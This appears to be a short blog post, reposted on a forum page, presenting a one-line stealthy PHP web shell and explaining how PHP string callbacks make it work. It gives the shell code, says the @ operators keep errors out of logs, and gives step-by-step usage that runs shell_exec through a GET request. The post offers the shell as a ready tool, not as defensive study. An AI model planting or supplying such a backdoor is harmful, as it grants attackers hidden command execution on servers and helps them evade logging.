Have you ever needed a small shell written in PHP?
Of course you have. But I bet it haven't been all too stealth!
This is really pointless, but someone might be interested in it.
So here you go folks!
<?=($_=@$_GET[2]).@$_($_GET[1])?>
It doesn't look like much so let me explain.
PHP allows strings to be interpreted as function calls.
That's a major part on how callbacks in PHP work.
Example:
<?
$array = array(1,2,3);
array_walk($array, 'f');
function f($x){echo $x * 2;}
?>
What the following example does, is that array_walk() iterates through the array $array and applies the function f() on each and every element in the list.
The function f() prints out the value from the array and multiplies it by two.
The output results in: 246.
The fun thing is, if you look on how the callback f() is applied - it's by a simple string. (Look at argument #2 in the first function; array_walk()).
What does that mean?
Well, to put it short, you're able to take a string - and execute it as a function name.
Now, let's try something... fuzzier...
<?
$fuzz = 'phpinfo';
$fuzz();
?>
What might this do?
Will it execute?
Damn right.
Now let's tear my tiny code apart.
It's made out of two parts.
- $_=@$_GET[2]
- @$_($_GET[1])
The first part takes the value from the GET-variable 2 and stores it in the temporary variable $_.
The second part takes our temporary variable $_, and executes it with the GET-variable 1 as it's one-and-only argument.
The @'s are only there for suppressing notices, warnings and/or fatals from showing up in logs, to the user or whatever else that might catch them.
Conclusion: Copy and paste the snippet, and store it in a PHP-file.
Execute a shell by going to: copypaste.php?1=shell_exec&2=whoami
The response should be something like:
apache
...or as on Windows if you're running your server as a service:
nt authority/system.
Conclusion; PHP is fun!
Ciao!
http://h.ackack.net/tiny-php-shell.html
http://www.thespanner.co.uk/2011/09/22/non-alphanumeric-code-in-php/
扫一扫
682
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
